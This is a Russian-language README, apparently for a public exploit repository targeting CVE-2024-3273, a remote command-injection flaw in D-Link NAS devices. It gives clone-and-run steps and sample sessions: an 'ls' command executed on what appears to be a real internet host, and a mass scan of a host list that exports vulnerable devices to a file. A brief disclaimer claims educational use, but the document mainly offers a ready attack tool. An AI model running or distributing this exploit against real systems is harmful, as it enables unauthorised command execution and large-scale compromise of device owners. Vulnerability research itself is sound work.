
Эксплойт для CVE-2024-3273, поддерживает одиночные и множественные хосты.
Этот репозиторий содержит доказательство концепции (PoC) для CVE-2024-3273, уязвимости безопасности, обнаруженной в устройствах D-Link NAS. Уязвимость позволяет атакующим выполнять произвольные команды на уязвимых устройствах.
CVE-2024-3273 — это уязвимость в устройствах D-Link NAS, которая позволяет удаленным атакующим выполнять произвольные команды через специально сформированный HTTP-запрос к конечной точке cgi-bin/nas_sharing.cgi.
Этот PoC демонстрирует, как уязвимость может быть использована для выполнения команд на уязвимых устройствах D-Link NAS.
requestsКлонируйте этот репозиторий:
git clone https://github.com/adhikara13/CVE-2024-3273.git
Перейдите в каталог репозитория:
cd CVE-2024-3273
Запустите PoC:
python main.py
Следуйте инструкциям на экране, чтобы выбрать целевое устройство:
host:port, и выберите, экспортировать ли уязвимые хосты в vulnerables.txt.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
Этот PoC предназначен только для образовательных и исследовательских целей. Используйте его ответственно и только на устройствах, которые вы уполномочены тестировать.
Приветствуются любые вклады! Если вы найдете какие-либо проблемы или улучшения, не стесняйтесь открыть issue или создать pull request.